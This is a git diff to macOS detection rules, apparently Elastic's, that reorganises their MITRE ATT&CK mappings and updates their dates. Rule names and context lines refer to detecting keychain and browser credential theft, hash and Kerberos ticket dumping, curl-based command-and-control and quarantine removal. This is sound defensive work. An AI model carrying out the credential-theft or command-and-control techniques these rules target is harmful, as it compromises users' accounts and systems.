[rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" - [[rule.threat.technique]] - name = "Exfiltration Over Web Service" - id = "T1567" - reference = "https://attack.mitre.org/techniques/T1567/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" + +[[rule.threat.technique.subtechnique]] +id = "T1195.001" +name = "Compromise Software Dependencies and Development Tools" +reference = "https://attack.mitre.org/techniques/T1195/001/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/macos/command_and_control_perl_outbound_network_connection.toml b/rules/macos/command_and_control_perl_outbound_network_connection.toml index 5241029aa80..e3fa344b232 100644 --- a/rules/macos/command_and_control_perl_outbound_network_connection.toml +++ b/rules/macos/command_and_control_perl_outbound_network_connection.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -74,30 +74,35 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/command_and_control_potential_etherhiding_c2.toml b/rules/macos/command_and_control_potential_etherhiding_c2.toml index d6eb9a913f6..dfa3fa46769 100644 --- a/rules/macos/command_and_control_potential_etherhiding_c2.toml +++ b/rules/macos/command_and_control_potential_etherhiding_c2.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,45 +80,55 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique.subtechnique]] +id = "T1102.001" +name = "Dead Drop Resolver" +reference = "https://attack.mitre.org/techniques/T1102/001/" - [[rule.threat.technique.subtechnique]] - name = "Bidirectional Communication" - id = "T1102.002" - reference = "https://attack.mitre.org/techniques/T1102/002/" +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" - - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" - - [[rule.threat.technique.subtechnique]] - name = "JavaScript" - id = "T1059.007" - reference = "https://attack.mitre.org/techniques/T1059/007/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/command_and_control_script_interpreter_connection_to_non_standard_port.toml b/rules/macos/command_and_control_script_interpreter_connection_to_non_standard_port.toml index d4ff78d4875..ce91f8fa55a 100644 --- a/rules/macos/command_and_control_script_interpreter_connection_to_non_standard_port.toml +++ b/rules/macos/command_and_control_script_interpreter_connection_to_non_standard_port.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,35 +83,40 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" - [[rule.threat.technique]] - name = "Non-Standard Port" - id = "T1571" - reference = "https://attack.mitre.org/techniques/T1571/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" - - [[rule.threat.technique.subtechnique]] - name = "JavaScript" - id = "T1059.007" - reference = "https://attack.mitre.org/techniques/T1059/007/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/command_and_control_suspicious_curl_from_macos_application.toml b/rules/macos/command_and_control_suspicious_curl_from_macos_application.toml index 06b8d5ebbe5..17e43a7bf0f 100644 --- a/rules/macos/command_and_control_suspicious_curl_from_macos_application.toml +++ b/rules/macos/command_and_control_suspicious_curl_from_macos_application.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,12 +86,40 @@ process where host.os.type == "macos" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique]] - name = "Ingress Tool Transfer" - id = "T1105" - reference = "https://attack.mitre.org/techniques/T1105/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" + +[[rule.threat.technique.subtechnique]] +id = "T1553.001" +name = "Gatekeeper Bypass" +reference = "https://attack.mitre.org/techniques/T1553/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml b/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml index ba69a5cda68..6ad7cd47925 100644 --- a/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml +++ b/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,22 +80,32 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" - - [[rule.threat.technique]] - name = "Ingress Tool Transfer" - id = "T1105" - reference = "https://attack.mitre.org/techniques/T1105/" - - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" - - [[rule.threat.technique.subtechnique]] - name = "Bidirectional Communication" - id = "T1102.002" - reference = "https://attack.mitre.org/techniques/T1102/002/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" + +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/macos/command_and_control_suspicious_outbound_network_via_unsigned_binary.toml b/rules/macos/command_and_control_suspicious_outbound_network_via_unsigned_binary.toml index fa4d92218ac..8e423be320a 100644 --- a/rules/macos/command_and_control_suspicious_outbound_network_via_unsigned_binary.toml +++ b/rules/macos/command_and_control_suspicious_outbound_network_via_unsigned_binary.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,12 +85,30 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" - [[rule.threat.technique]] - name = "Non-Standard Port" - id = "T1571" - reference = "https://attack.mitre.org/techniques/T1571/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" + +[[rule.threat.technique.subtechnique]] +id = "T1553.001" +name = "Gatekeeper Bypass" +reference = "https://attack.mitre.org/techniques/T1553/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml b/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml index 9a0859fd9b0..1fbe462cdbd 100644 --- a/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml +++ b/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -188,11 +188,43 @@ id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.003" +name = "Exfiltration to Text Storage Sites" +reference = "https://attack.mitre.org/techniques/T1567/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.004" +name = "Exfiltration Over Webhook" +reference = "https://attack.mitre.org/techniques/T1567/004/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "destination.domain"] diff --git a/rules/macos/credential_access_dumping_hashes_bi_cmds.toml b/rules/macos/credential_access_dumping_hashes_bi_cmds.toml index 11e5309dca4..f3f8506634b 100644 --- a/rules/macos/credential_access_dumping_hashes_bi_cmds.toml +++ b/rules/macos/credential_access_dumping_hashes_bi_cmds.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,14 +100,18 @@ In macOS environments, built-in commands like `defaults` and `mkpassdb` can be e [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/macos/credential_access_high_volume_of_pbpaste.toml b/rules/macos/credential_access_high_volume_of_pbpaste.toml index 8cf8dad2102..113d70f61fe 100644 --- a/rules/macos/credential_access_high_volume_of_pbpaste.toml +++ b/rules/macos/credential_access_high_volume_of_pbpaste.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["endpoint", "jamf_protect"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/24" [transform] [[transform.investigate]] @@ -108,14 +108,26 @@ sequence by host.hostname, host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1056" name = "Input Capture" reference = "https://attack.mitre.org/techniques/T1056/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1115" +name = "Clipboard Data" +reference = "https://attack.mitre.org/techniques/T1115/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/macos/credential_access_kerberosdump_kcc.toml b/rules/macos/credential_access_kerberosdump_kcc.toml index e566cdb00e5..3c279360921 100644 --- a/rules/macos/credential_access_kerberosdump_kcc.toml +++ b/rules/macos/credential_access_kerberosdump_kcc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,6 +101,7 @@ Kerberos is a network authentication protocol designed to provide secure identit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" @@ -110,15 +111,18 @@ reference = "https://attack.mitre.org/techniques/T1003/" id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [[rule.threat.technique.subtechnique]] id = "T1558.003" name = "Kerberoasting" reference = "https://attack.mitre.org/techniques/T1558/003/" - +[[rule.threat.technique.subtechnique]] +id = "T1558.005" +name = "Ccache Files" +reference = "https://attack.mitre.org/techniques/T1558/005/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml index d1bc68892c1..938f9779c37 100644 --- a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml +++ b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,29 +107,23 @@ Keychain is macOS's secure storage system for managing user credentials, includi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.001" name = "Keychain" reference = "https://attack.mitre.org/techniques/T1555/001/" - -[[rule.threat.technique]] -id = "T1555" -name = "Credentials from Password Stores" -reference = "https://attack.mitre.org/techniques/T1555/" [[rule.threat.technique.subtechnique]] id = "T1555.003" name = "Credentials from Web Browsers" reference = "https://attack.mitre.org/techniques/T1555/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/macos/credential_access_mitm_localhost_webproxy.toml b/rules/macos/credential_access_mitm_localhost_webproxy.toml index 356443d7e15..dadd11cd20e 100644 --- a/rules/macos/credential_access_mitm_localhost_webproxy.toml +++ b/rules/macos/credential_access_mitm_localhost_webproxy.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,14 +103,31 @@ Web proxy settings in macOS manage how web traffic is routed, often used to enha [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1539" name = "Steal Web Session Cookie" reference = "https://attack.mitre.org/techniques/T1539/" +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml b/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml index 87666419b43..15af0dc3469 100644 --- a/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml +++ b/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/16" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -97,17 +97,29 @@ SSH (Secure Shell) is a protocol used to securely access remote systems. On macO [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.threshold] field = ["host.id"] value = 20 diff --git a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml index 24d5fa1fbd2..4cfbb25cd96 100644 --- a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml +++ b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/16" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -112,19 +112,36 @@ OSASCRIPT is a macOS utility that allows the execution of AppleScript and other [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1056" name = "Input Capture" reference = "https://attack.mitre.org/techniques/T1056/" + [[rule.threat.technique.subtechnique]] id = "T1056.002" name = "GUI Input Capture" reference = "https://attack.mitre.org/techniques/T1056/002/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml b/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml index 26ee109c54d..7a1234c88ea 100644 --- a/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml +++ b/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -73,20 +73,46 @@ process.name:python* [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1539" +name = "Steal Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1539/" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.001" name = "Keychain" reference = "https://attack.mitre.org/techniques/T1555/001/" +[[rule.threat.technique]] +id = "T1558" +name = "Steal or Forge Kerberos Tickets" +reference = "https://attack.mitre.org/techniques/T1558/" + +[[rule.threat.technique.subtechnique]] +id = "T1558.005" +name = "Ccache Files" +reference = "https://attack.mitre.org/techniques/T1558/005/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "file.path"] diff --git a/rules/macos/credential_access_suspicious_web_browser_sensitive_file_access.toml b/rules/macos/credential_access_suspicious_web_browser_sensitive_file_access.toml index 9bc52f1784b..535d1743a39 100644 --- a/rules/macos/credential_access_suspicious_web_browser_sensitive_file_access.toml +++ b/rules/macos/credential_access_suspicious_web_browser_sensitive_file_access.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,6 +105,7 @@ Web browsers store sensitive data like cookies and login credentials in specific [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1539" name = "Steal Web Session Cookie" @@ -114,15 +115,26 @@ reference = "https://attack.mitre.org/techniques/T1539/" id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.003" name = "Credentials from Web Browsers" reference = "https://attack.mitre.org/techniques/T1555/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/macos/credential_access_systemkey_dumping.toml b/rules/macos/credential_access_systemkey_dumping.toml index 0ce7fb22576..1f86c92819d 100644 --- a/rules/macos/credential_access_systemkey_dumping.toml +++ b/rules/macos/credential_access_systemkey_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,19 +99,31 @@ macOS keychains securely store user credentials, including passwords and certifi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.001" name = "Keychain" reference = "https://attack.mitre.org/techniques/T1555/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/macos/defense_evasion_apple_softupdates_modification.toml b/rules/macos/defense_evasion_apple_softupdates_modification.toml index 744d460b16f..379b50eb32c 100644 --- a/rules/macos/defense_evasion_apple_softupdates_modification.toml +++ b/rules/macos/defense_evasion_apple_softupdates_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/15" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,19 +99,23 @@ In macOS environments, the SoftwareUpdate preferences manage system updates, cru [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique]] +id = "T1647" +name = "Plist File Modification" +reference = "https://attack.mitre.org/techniques/T1647/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml index 2a5331cde71..5f07e83525a 100644 --- a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml +++ b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,19 +107,28 @@ In 